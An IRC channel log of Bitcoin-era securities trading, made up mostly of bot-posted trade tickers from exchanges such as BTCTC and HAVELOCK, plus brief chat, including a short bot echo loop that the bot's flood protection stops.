[SDSTM] 4 @ 0.00951 = 0.038 BTC [-] Jul 19 14:56:14 [HAVELOCK] [SDSTM] 394 @ 0.0095 = 3.743 BTC [-] Jul 19 14:56:15 [HAVELOCK] [SDSTM] 40 @ 0.00947815 = 0.3791 BTC [-] Jul 19 14:56:17 [HAVELOCK] [SDSTM] 106 @ 0.00947814 = 1.0047 BTC [-] Jul 19 14:56:19 [HAVELOCK] [SDSTM] 434 @ 0.00920002 = 3.9928 BTC [-] Jul 19 14:57:31 [BTCTC] [TAT.ASICMINER] 40 @ 0.044792 = 1.7917 BTC [-] Jul 19 14:57:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.044898 = 0.1796 BTC [+] Jul 19 14:57:35 [BTCTC] [TAT.ASICMINER] 32 @ 0.0449 = 1.4368 BTC [+] Jul 19 14:57:37 [BTCTC] [TAT.ASICMINER] 25 @ 0.044999 = 1.125 BTC [+] Jul 19 14:57:38 [BTCTC] [TAT.ASICMINER] 878 @ 0.045 = 39.51 BTC [+] Jul 19 14:57:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.045699 = 2.285 BTC [+] Jul 19 14:57:41 [BTCTC] [TAT.ASICMINER] 100 @ 0.0457 = 4.57 BTC [+] Jul 19 14:57:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.04589 = 2.2945 BTC [+] Jul 19 14:57:48 [BTCTC] [TAT.ASICMINER] 300 @ 0.045894 = 13.7682 BTC [+] Jul 19 14:57:50 [BTCTC] [TAT.ASICMINER] 106 @ 0.045895 = 4.8649 BTC [+] Jul 19 14:57:52 [BTCTC] [TAT.ASICMINER] 15 @ 0.045898 = 0.6885 BTC [+] Jul 19 14:57:53 [BTCTC] [TAT.ASICMINER] 60 @ 0.0462 = 2.772 BTC [+] Jul 19 14:59:31 [HAVELOCK] [SDSTM] 1 @ 0.0115 BTC [+] Jul 19 15:02:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.046299 BTC [+] Jul 19 15:09:10 [HAVELOCK] [HIM] 1 @ 0.268 BTC [+] Jul 19 15:10:16 [BTCTC] [AMC-PT] 300 @ 0.0025 = 0.75 BTC [+] Jul 19 15:11:42 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 15:12:15 [HAVELOCK] [AM100] 88 @ 0.045397 = 3.9949 BTC [+] Jul 19 15:12:18 [HAVELOCK] [AM100] 60 @ 0.045398 = 2.7239 BTC [+] Jul 19 15:12:20 [HAVELOCK] [AM100] 152 @ 0.045494 = 6.9151 BTC [+] Jul 19 15:13:10 [HAVELOCK] [AM100] 70 @ 0.045494 = 3.1846 BTC [+] Jul 19 15:13:13 [HAVELOCK] [AM100] 30 @ 0.0454998 = 1.365 BTC [+] Jul 19 15:13:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.046199 BTC [-] Jul 19 15:15:50 [BTCTC] [ASICMINER-PT] 1 @ 4.7888 BTC [+] Jul 19 15:15:52 [BTCTC] [ASICMINER-PT] 3 @ 4.79 = 14.37 BTC [+] Jul 19 15:15:54 [BTCTC] [ASICMINER-PT] 1 @ 4.79 BTC [+] Jul 19 15:15:55 [BTCTC] [ASICMINER-PT] 2 @ 4.8 = 9.6 BTC [+] Jul 19 15:15:57 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [+] Jul 19 15:16:07 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [+] Jul 19 15:16:09 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 15:16:10 [BTCTC] [ASICMINER-PT] 10 @ 4.8205 = 48.205 BTC [+] Jul 19 15:16:16 [BTCTC] [ASICMINER-PT] 1 @ 4.828 BTC [+] Jul 19 15:16:18 [BTCTC] [ASICMINER-PT] 10 @ 4.849999 = 48.5 BTC [+] Jul 19 15:16:20 [BTCTC] [ASICMINER-PT] 1 @ 4.859 BTC [+] Jul 19 15:16:23 [BTCTC] [ASICMINER-PT] 3 @ 4.87 = 14.61 BTC [+] Jul 19 15:16:24 [BTCTC] [ASICMINER-PT] 77 @ 4.881 = 375.837 BTC [+] Jul 19 15:16:26 [BTCTC] [ASICMINER-PT] 5 @ 4.886995 = 24.435 BTC [+] Jul 19 15:16:28 [BTCTC] [LTC-ATF.B2] 4 @ 0.01 = 0.04 BTC [-] Jul 19 15:16:30 [BTCTC] [ASICMINER-PT] 1 @ 4.887 BTC [+] Jul 19 15:16:31 [BTCTC] [LTC-ATF.B2] 15 @ 0.009986 = 0.1498 BTC [-] Jul 19 15:16:33 [BTCTC] [ASICMINER-PT] 35 @ 4.888 = 171.08 BTC [+] Jul 19 15:16:33 [BTCTC] [LTC-ATF.B2] 33 @ 0.009985 = 0.3295 BTC [-] Jul 19 15:16:34 [BTCTC] [ASICMINER-PT] 20 @ 4.889999 = 97.8 BTC [+] Jul 19 15:16:35 [BTCTC] [LTC-ATF.B2] 343 @ 0.00998 = 3.4231 BTC [-] Jul 19 15:16:37 [BTCTC] [LTC-ATF.B2] 200 @ 0.00995 = 1.99 BTC [-] Jul 19 15:16:38 [BTCTC] [ASICMINER-PT] 28 @ 4.9 = 137.2 BTC [+] Jul 19 15:16:39 [BTCTC] [DMS.SELLING] 9 @ 0.02231 = 0.2008 BTC [+] Jul 19 15:16:41 [BTCTC] [LTC-ATF.B2] 20 @ 0.00991 = 0.1982 BTC [-] Jul 19 15:16:44 [BTCTC] [LTC-ATF.B2] 500 @ 0.0099 = 4.95 BTC [-] Jul 19 15:16:46 [BTCTC] [LTC-ATF.B2] 500 @ 0.0099 = 4.95 BTC [-] Jul 19 15:16:57 [BTCTC] [LTC-ATF.B2] 352 @ 0.0099 = 3.4848 BTC [-] Jul 19 15:17:30 [BTCTC] [DMS.SELLING] 6 @ 0.02231 = 0.1339 BTC [+] Jul 19 15:17:43 ;;NETHASH Jul 19 15:17:44 222740.374809 Jul 19 15:17:53 ;;bcstats Jul 19 15:17:56 Current Blocks: 247362 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 605 blocks | Next Difficulty In About: 3 days, 15 hours, 28 minutes, and 11 seconds | Next Difficulty Estimate: 30176058.0349 | Estimated Percent Change: 15.33922 Jul 19 15:17:59 [BTCTC] [DMS.SELLING] 4 @ 0.0223 = 0.0892 BTC [-] Jul 19 15:18:02 .n Jul 19 15:18:03 222740.374809 Jul 19 15:18:03 tbh Jul 19 15:18:15 :) Jul 19 15:18:18 saves you 7 keystrokes :P Jul 19 15:18:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.046199 BTC [-] Jul 19 15:18:22 [BTCTC] [AMC-PT] 7500 @ 0.0025 = 18.75 BTC [+] Jul 19 15:18:33 i only have so many strokes left in me Jul 19 15:18:47 Jezzz: fix this Jul 19 15:18:50 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:51 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:52 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:53 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:53 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:54 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:55 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:56 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:56 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:57 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:57 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:58 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:58 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:18:59 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:00 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:01 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:01 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:01 lol Jul 19 15:19:02 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:02 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:03 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:03 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:04 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:05 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:06 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:06 http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:07 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 19 15:19:07 You've given me 12 commands within the last minute; I'm now ignoring you for 5 minutes. Jul 19 15:19:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0462 BTC [+] Jul 19 15:19:22 heh Jul 19 15:19:23 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 15:19:48 but how do we fix Scrat? Jul 19 15:20:06 i'm broken beyond repair Jul 19 15:20:28 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 15:20:30 [BTCTC] [DMS.PURCHASE] 16 @ 0.039505 = 0.6321 BTC [-] Jul 19 15:20:41 [BTCTC] [AMC-PT] 450 @ 0.0025 = 1.125 BTC [+] Jul 19 15:21:13 echo wait 10? Jul 19 15:21:46 or simply dont post the title if it starts with ;; or ! Jul 19 15:21:51 .ignore Scrat Jul 19 15:21:54 done :P Jul 19 15:21:57 .bait Jul 19 15:22:00 nooo Jul 19 15:22:02 http://31.media.tumblr.com/46772ebd8f0f9715963180b4ce7d495a/tumblr_mp13cs2ZIa1supm91o1_500.jpg Jul 19 15:22:05 yes Jul 19 15:22:12 why would you even have a "echo" command? Jul 19 15:22:36 to make Scrat feel special Jul 19 15:22:51 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [+] Jul 19 15:23:01 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 15:23:57 [HAVELOCK] [AM100] 1 @ 0.04360001 BTC [-] Jul 19 15:24:34 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 15:26:01 [BTCTC] [BASIC-MINING] 6 @ 0.7 = 4.2 BTC [-] Jul 19 15:26:05 [HAVELOCK] [AM1] 9 @ 4.63999999 = 41.76 BTC [-] Jul 19 15:26:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0462 BTC [+] Jul 19 15:26:53 [BTCTC] [TAT.ASICMINER] 25 @ 0.046299 = 1.1575 BTC [+] Jul 19 15:26:55 [BTCTC] [TAT.ASICMINER] 378 @ 0.0463 = 17.5014 BTC [+] Jul 19 15:26:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.0464 = 0.5568 BTC [+] Jul 19 15:26:58 [BTCTC] [TAT.ASICMINER] 7 @ 0.04645 = 0.3252 BTC [+] Jul 19 15:27:00 [BTCTC] [TAT.ASICMINER] 27 @ 0.0465 = 1.2555 BTC [+] Jul 19 15:27:13 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 15:27:34 [BTCTC] [AMC-PT] 5700 @ 0.0025 = 14.25 BTC [+] Jul 19 15:27:50 [BTCTC] [AMC-PT] 578 @ 0.0025 = 1.445 BTC [+] Jul 19 15:27:53 [BTCTC] [AMC-PT] 1679 @ 0.0025 = 4.1975 BTC [+] Jul 19 15:27:54 [HAVELOCK] [AM1] 4 @ 4.64 = 18.56 BTC [+] Jul 19 15:27:58 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 19 15:28:15 [HAVELOCK] [AM1] 5 @ 4.64 = 23.2 BTC [+] Jul 19 15:28:27 [BTCTC] [AMC-PT] 19 @ 0.0025 = 0.0475 BTC [+] Jul 19 15:28:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.046298 = 0.463 BTC [-] Jul 19 15:28:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.0465 = 0.279 BTC [+] Jul 19 15:31:36 [BTCTC] [BASIC-MINING] 3 @ 0.700001 = 2.1 BTC [+] Jul 19 15:31:37 [BTCTC] [GSDPT] 8 @ 0.003334 = 0.0267 BTC [-] Jul 19 15:31:39 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [-] Jul 19 15:31:40 [BTCTC] [GSDPT] 281 @ 0.003063 = 0.8607 BTC [-] Jul 19 15:31:43 [BTCTC] [BASIC-MINING] 2 @ 0.7 = 1.4 BTC [-] Jul 19 15:31:45 [BTCTC] [BASIC-MINING] 1 @ 0.695311 BTC [-] Jul 19 15:31:47 [BTCTC] [BASIC-MINING] 2 @ 0.6953 = 1.3906 BTC [-] Jul 19 15:31:48 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 15:33:04 [HAVELOCK] [AM100] 5 @ 0.0454998 = 0.2275 BTC [+] Jul 19 15:33:37 [BTCTC] [AMC-PT] 330 @ 0.0025 = 0.825 BTC [+] Jul 19 15:33:54 [BTCTC] [AMC-PT] 2500 @ 0.0025 = 6.25 BTC [+] Jul 19 15:34:30 [BTCTC] [AMC-PT] 24 @ 0.0025 = 0.06 BTC [+] Jul 19 15:37:33 [BTCTC] [AMC-PT] 5350 @ 0.0025 = 13.375 BTC [+] Jul 19 15:38:45 [BTCTC] [AMC-PT] 3800 @ 0.0025 = 9.5 BTC [+] Jul 19 15:39:51 [BTCTC] [AMC-PT] 361 @ 0.0025 = 0.9025 BTC [+] Jul 19 15:39:54 [BTCTC] [AMC-PT] 3500 @ 0.0025 = 8.75 BTC [+] Jul 19 15:40:21 [BTCTC] [GSDPT] 81 @ 0.00345 = 0.2795 BTC [+] Jul 19 15:40:32 [BTCTC] [ASICMINER-PT] 2 @ 4.874 = 9.748 BTC [-] Jul 19 15:41:20 [BTCTC] [COGNITIVE] 1 @ 0.759999 BTC [+] Jul 19 15:41:22 [BTCTC] [COGNITIVE] 4 @ 0.76 = 3.04 BTC [+] Jul 19 15:41:23 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [+] Jul 19 15:41:27 [BTCTC] [COGNITIVE] 1 @ 0.706001 BTC [-] Jul 19 15:41:34 [BTCTC] [COGNITIVE] 2 @ 0.706 = 1.412 BTC [-] Jul 19 15:42:13 [BTCTC] [BASIC-MINING] 3 @ 0.695201 = 2.0856 BTC [-] Jul 19 15:42:33 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 15:42:54 [BTCTC] [AMC-PT] 288 @ 0.0025 = 0.72 BTC [+] Jul 19 15:43:16 [BTCTC] [BASIC-MINING] 4 @ 0.6952 = 2.7808 BTC [-] Jul 19 15:43:29 [BTCTC] [AMC-PT] 845 @ 0.0025 = 2.1125 BTC [+] Jul 19 15:43:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.0465 = 0.186 BTC [+] Jul 19 15:44:31 [MPEX] [S.MPOE] 14800 @ 0.00088351 = 13.0759 BTC [+] Jul 19 15:44:41 [BTCTC] [AMC-PT] 1700 @ 0.0025 = 4.25 BTC [+] Jul 19 15:44:44 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [+] Jul 19 15:45:25 [BTCTC] [COGNITIVE] 9 @ 0.76 = 6.84 BTC [+] Jul 19 15:45:35 [BTCTC] [AMC-PT] 134 @ 0.0025 = 0.335 BTC [+] Jul 19 15:47:48 [BTCTC] [AMC-PT] 1200 @ 0.0025 = 3 BTC [+] Jul 19 15:48:29 [BTCTC] [AMC-PT] 1878 @ 0.0025 = 4.695 BTC [+] Jul 19 15:48:29 [BTCTC] [AMC-PT] 220 @ 0.0025 = 0.55 BTC [+] Jul 19 15:50:18 [BTCTC] [ASICMINER-PT] 10 @ 4.8 = 48 BTC [-] Jul 19 15:50:18 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 15:50:23 [BTCTC] [AMC-PT] 375 @ 0.0025 = 0.9375 BTC [+] Jul 19 15:50:23 [BTCTC] [ASICMINER-PT] 12 @ 4.8 = 57.6 BTC [-] Jul 19 15:51:12 [BTCTC] [ASICMINER-PT] 10 @ 4.89399 = 48.9399 BTC [+] Jul 19 15:51:22 [BTCTC] [TAT.ASICMINER] 20 @ 0.0466 = 0.932 BTC [+] Jul 19 15:51:55 [HAVELOCK] [AM1] 5 @ 4.7 = 23.5 BTC [+] Jul 19 15:52:06 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 19 15:53:20 [BTCTC] [ASICMINER-PT] 7 @ 4.01 = 28.07 BTC [-] Jul 19 15:53:33 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 15:53:37 [BTCTC] [AMC-PT] 581 @ 0.0025 = 1.4525 BTC [+] Jul 19 15:53:40 [BTCTC] [AMC-PT] 1 @ 0.002499 BTC [-] Jul 19 15:53:41 [BTCTC] [AMC-PT] 649 @ 0.002499 = 1.6219 BTC [-] Jul 19 15:53:43 [BTCTC] [AMC-PT] 15400 @ 0.0025 = 38.5 BTC [+] Jul 19 15:53:47 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 19 15:54:50 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jul 19 15:54:56 [HAVELOCK] [AM1] 5 @ 4.7 = 23.5 BTC [+] Jul 19 15:56:08 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 15:57:14 [BTCTC] [AMC-PT] 285 @ 0.0025 = 0.7125 BTC [+] Jul 19 15:57:38 [BTCTC] [AMC-PT] 4045 @ 0.0025 = 10.1125 BTC [+] Jul 19 15:57:51 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 15:58:33 [BTCTC] [AMC-PT] 51400 @ 0.0025 = 128.5 BTC [+] Jul 19 15:58:45 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 19 15:58:48 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 15:59:07 [BTCTC] [AMC-PT] 11700 @ 0.0025 = 29.25 BTC [+] Jul 19 15:59:30 [BTCTC] [BASIC-MINING] 3 @ 0.734649 = 2.2039 BTC [+] Jul 19 16:01:16 [BTCTC] [AMC-PT] 57500 @ 0.0025 = 143.75 BTC [+] Jul 19 16:01:19 [BTCTC] [ASICMINER-PT] 10 @ 4.1 = 41 BTC [+] Jul 19 16:02:06 [BTCTC] [AMC-PT] 1900 @ 0.0025 = 4.75 BTC [+] Jul 19 16:02:25 [BTCTC] [AMC-PT] 83 @ 0.0025 = 0.2075 BTC [+] Jul 19 16:02:33 [BTCTC] [AMC-PT] 66 @ 0.0025 = 0.165 BTC [+] Jul 19 16:03:02 [HAVELOCK] [SMG] 1 @ 0.00038 BTC [-] Jul 19 16:03:05 [HAVELOCK] [SMG] 3 @ 0.0003405 = 0.001 BTC [-] Jul 19 16:03:07 [HAVELOCK] [SMG] 50 @ 0.00034 = 0.017 BTC [-] Jul 19 16:03:09 [HAVELOCK] [SMG] 50 @ 0.00033 = 0.0165 BTC [-] Jul 19 16:03:10 [HAVELOCK] [SMG] 50 @ 0.00032 = 0.016 BTC [-] Jul 19 16:03:12 [HAVELOCK] [SMG] 50 @ 0.00031 = 0.0155 BTC [-] Jul 19 16:03:14 [HAVELOCK] [SMG] 5000 @ 0.0003 = 1.5 BTC [-] Jul 19 16:03:16 [HAVELOCK] [SMG] 1000 @ 0.0003 = 0.3 BTC [-] Jul 19 16:03:19 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 19 16:03:48 [BTCTC] [AMC-PT] 1420 @ 0.0025 = 3.55 BTC [+] Jul 19 16:04:14 [BTCTC] [TAT.ASICMINER] 25 @ 0.043827 = 1.0957 BTC [-] Jul 19 16:04:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.043826 = 2.1913 BTC [-] Jul 19 16:04:19 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 16:04:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.043751 = 0.2188 BTC [-] Jul 19 16:04:42 [BTCTC] [AMC-PT] 2400 @ 0.0025 = 6 BTC [+] Jul 19 16:05:13 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 16:06:13 [BTCTC] [AMC-PT] 1398 @ 0.0025 = 3.495 BTC [+] Jul 19 16:06:16 [HAVELOCK] [AM100] 5 @ 0.0445 = 0.2225 BTC [-] Jul 19 16:06:36 [HAVELOCK] [AM100] 13 @ 0.04375 = 0.5688 BTC [-] Jul 19 16:07:11 [HAVELOCK] [HIM] 3 @ 0.268 = 0.804 BTC [+] Jul 19 16:07:30 [BTCTC] [PAJKA.BOND] 22 @ 0.041578 = 0.9147 BTC [-] Jul 19 16:08:14 [BTCTC] [AMC-PT] 340 @ 0.0025 = 0.85 BTC [+] Jul 19 16:08:46 [HAVELOCK] [AM100] 2 @ 0.045 = 0.09 BTC [+] Jul 19 16:09:06 [BTCTC] [AMC-PT] 24 @ 0.0025 = 0.06 BTC [+] Jul 19 16:10:18 http://www.oecd.org/newsroom/closing-tax-gaps-oecd-launches-action-plan-on-base-erosion-and-profit-shifting.htm Jul 19 16:11:04 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 19 16:11:22 [BTCTC] [AMC-PT] 1100 @ 0.0025 = 2.75 BTC [+] Jul 19 16:12:37 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 16:12:51 [BTCTC] [TAT.ASICMINER] 31 @ 0.043753 = 1.3563 BTC [+] Jul 19 16:12:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.043752 = 2.1876 BTC [-] Jul 19 16:13:00 [BTCTC] [AMC-PT] 240 @ 0.0025 = 0.6 BTC [+] Jul 19 16:13:09 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 19 16:13:12 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 16:13:42 [BTCTC] [ASICMINER-PT] 2 @ 4.87 = 9.74 BTC [+] Jul 19 16:14:15 [BTCTC] [TAT.ASICMINER] 12 @ 0.04375 = 0.525 BTC [-] Jul 19 16:14:16 [BTCTC] [COGNITIVE] 1 @ 0.705006 BTC [-] Jul 19 16:14:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.043703 = 0.1311 BTC [-] Jul 19 16:14:22 [BTCTC] [COGNITIVE] 1 @ 0.705005 BTC [-] Jul 19 16:14:23 [BTCTC] [TAT.ASICMINER] 6 @ 0.043702 = 0.2622 BTC [-] Jul 19 16:14:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.043419 = 0.8684 BTC [-] Jul 19 16:14:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.043418 = 0.2605 BTC [-] Jul 19 16:14:31 [BTCTC] [ASICMINER-PT] 5 @ 4.710001 = 23.55 BTC [-] Jul 19 16:14:34 [BTCTC] [AMC-PT] 16 @ 0.0025 = 0.04 BTC [+] Jul 19 16:14:36 [BTCTC] [ASICMINER-PT] 17 @ 4.71 = 80.07 BTC [-] Jul 19 16:15:25 [BTCTC] [COGNITIVE] 1 @ 0.759999 BTC [+] Jul 19 16:15:36 [BTCTC] [AMC-PT] 20000 @ 0.0025 = 50 BTC [+] Jul 19 16:16:00 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 16:16:15 [BTCTC] [AMC-PT] 3000 @ 0.0025 = 7.5 BTC [+] Jul 19 16:16:20 [BTCTC] [AMC-PT] 4950 @ 0.0025 = 12.375 BTC [+] Jul 19 16:16:22 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 16:16:45 [BTCTC] [AMC-PT] 826 @ 0.0025 = 2.065 BTC [+] Jul 19 16:16:59 [BTCTC] [AMC-PT] 561 @ 0.0025 = 1.4025 BTC [+] Jul 19 16:17:05 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 16:17:12 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 16:17:17 [BTCTC] [AMC-PT] 21200 @ 0.0025 = 53 BTC [+] Jul 19 16:17:22 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 19 16:17:27 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 19 16:17:33 [BTCTC] [ASICMINER-PT] 1 @ 4.710002 BTC [+] Jul 19 16:17:38 [BTCTC] [COGNITIVE] 2 @ 0.7599 = 1.5198 BTC [-] Jul 19 16:17:40 [BTCTC] [COGNITIVE] 3 @ 0.690051 = 2.0702 BTC [-] Jul 19 16:17:41 [BTCTC] [COGNITIVE] 12 @ 0.69005 = 8.2806 BTC [-] Jul 19 16:17:48 [BTCTC] [AMC-PT] 15000 @ 0.0025 = 37.5 BTC [+] Jul 19 16:17:53 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [+] Jul 19 16:18:24 [BTCTC] [AMC-PT] 15000 @ 0.0025 = 37.5 BTC [+] Jul 19 16:18:44 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [+] Jul 19 16:18:53 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 19 16:19:05 [BTCTC] [BASIC-MINING] 3 @ 0.729999 = 2.19 BTC [-] Jul 19 16:19:07 [BTCTC] [BASIC-MINING] 2 @ 0.73 = 1.46 BTC [+] Jul 19 16:19:08 [BTCTC] [BASIC-MINING] 4 @ 0.735 = 2.94 BTC [+] Jul 19 16:19:10 [BTCTC] [BASIC-MINING] 1 @ 0.749 BTC [+] Jul 19 16:19:11 [BTCTC] [BASIC-MINING] 1 @ 0.749999 BTC [+] Jul 19 16:19:12 [BTCTC] [BASIC-MINING] 3 @ 0.75 = 2.25 BTC [+] Jul 19 16:19:14 [BTCTC] [BASIC-MINING] 1 @ 0.753996 BTC [+] Jul 19 16:19:29 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 19 16:19:32 [BTCTC] [AMC-PT] 1830 @ 0.0025 = 4.575 BTC [+] Jul 19 16:20:28 [BTCTC] [DMS.SELLING] 6 @ 0.0223 = 0.1338 BTC [-] Jul 19 16:20:28 [BTCTC] [DMS.SELLING] 20 @ 0.0223 = 0.446 BTC [-] Jul 19 16:20:28 [BTCTC] [DMS.SELLING] 5 @ 0.02202 = 0.1101 BTC [-] Jul 19 16:20:29 [BTCTC] [DMS.SELLING] 19 @ 0.022 = 0.418 BTC [-] Jul 19 16:20:31 [BTCTC] [LTC-ATF.B2] 50 @ 0.01 = 0.5 BTC [+] Jul 19 16:20:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.043419 = 0.2171 BTC [+] Jul 19 16:20:51 [BTCTC] [AMC-PT] 3000 @ 0.0025 = 7.5 BTC [+] Jul 19 16:20:55 [BTCTC] [AMC-PT] 450 @ 0.0025 = 1.125 BTC [+] Jul 19 16:21:54 [BTCTC] [AMC-PT] 46 @ 0.0025 = 0.115 BTC [+] Jul 19 16:22:19 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 16:22:55 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jul 19 16:23:08 [HAVELOCK] [AM100] 26 @ 0.044001 = 1.144 BTC [-] Jul 19 16:23:21 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [+] Jul 19 16:23:24 [BTCTC] [AMC-PT] 440 @ 0.0025 = 1.1 BTC [+] Jul 19 16:24:27 [BTCTC] [ASICMINER-PT] 1 @ 4.710002 BTC [+] Jul 19 16:24:32 [BTCTC] [ASICMINER-PT] 6 @ 4.700001 = 28.2 BTC [-] Jul 19 16:24:35 [BTCTC] [AMC-PT] 70 @ 0.0025 = 0.175 BTC [+] Jul 19 16:25:19 [BTCTC] [AMC-PT] 16193 @ 0.0025 = 40.4825 BTC [+] Jul 19 16:25:22 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 16:25:43 [BTCTC] [AMC-PT] 1 @ 0.002501 BTC [+] Jul 19 16:25:45 [BTCTC] [BASIC-MINING] 1 @ 0.7121 BTC [-] Jul 19 16:25:48 [BTCTC] [AMC-PT] 1 @ 0.00251 BTC [+] Jul 19 16:26:18 [BTCTC] [BASIC-MINING] 1 @ 0.712 BTC [-] Jul 19 16:27:07 [BTCTC] [AMC-PT] 1 @ 0.00275 BTC [+] Jul 19 16:27:15 [BTCTC] [AMC-PT] 499 @ 0.00275 = 1.3723 BTC [+] Jul 19 16:28:49 [BTCTC] [COGNITIVE] 1 @ 0.690053 BTC [+] Jul 19 16:29:13 [BTCTC] [AMC-PT] 1 @ 0.00297 BTC [+] Jul 19 16:29:29 [BTCTC] [DMS.MINING] 36 @ 0.016248 = 0.5849 BTC [-] Jul 19 16:29:30 [BTCTC] [AMC-PT] 225 @ 0.00291 = 0.6548 BTC [-] Jul 19 16:29:48 [HAVELOCK] [SMG] 8000 @ 0.000302 = 2.416 BTC [+] Jul 19 16:29:50 [HAVELOCK] [SMG] 2000 @ 0.000302 = 0.604 BTC [+] Jul 19 16:30:32 [BTCTC] [AMC-PT] 125 @ 0.00291 = 0.3638 BTC [-] Jul 19 16:30:32 [BTCTC] [AMC-PT] 100 @ 0.00295 = 0.295 BTC [+] Jul 19 